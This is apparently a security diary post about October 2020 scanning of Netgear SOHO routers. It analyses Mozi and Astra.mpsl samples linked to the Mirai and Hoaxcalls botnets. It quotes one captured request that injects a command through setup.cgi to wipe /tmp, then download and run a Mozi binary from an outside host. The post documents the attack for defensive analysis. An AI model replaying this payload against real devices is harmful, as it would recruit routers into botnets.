In the past 30 days lots of scanning activity looking for small office and home office (SOHO) routers targeting Netgear.
20201002-165049: 192.168.25.9:80-220.127.116.11:41237 data 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//18.104.22.168:59209/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0\r\n\r\n'
Sampling multiple Mozi.a and Mozi.m files, analysis of each samples indicates if successful, it would attempt to connect the router to the Mirai botnet.
However, one of the file samples (Astra.mpsl) recovered was never submitted to Virustotal or any other sandbox and remained unidentified. Based on the information contained in the file, it is targeting the Huawei Home Gateway. One of the tell tale in the binary is the following string: 'Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS' which likely indicate it would connect the router to the Hoaxcalls Botnet.
This is part of the content of Astra.mpsl which shows it the targeted router is Huawei Home Gateway.
Suspicious Files and Scripts: Mozi.a/m (Mirai Botnet)
Indicators of Compromised
SOHO Active Scanners
Oct 3rd 2020
|Thread locked Subscribe||
Oct 3rd 2020
11 months ago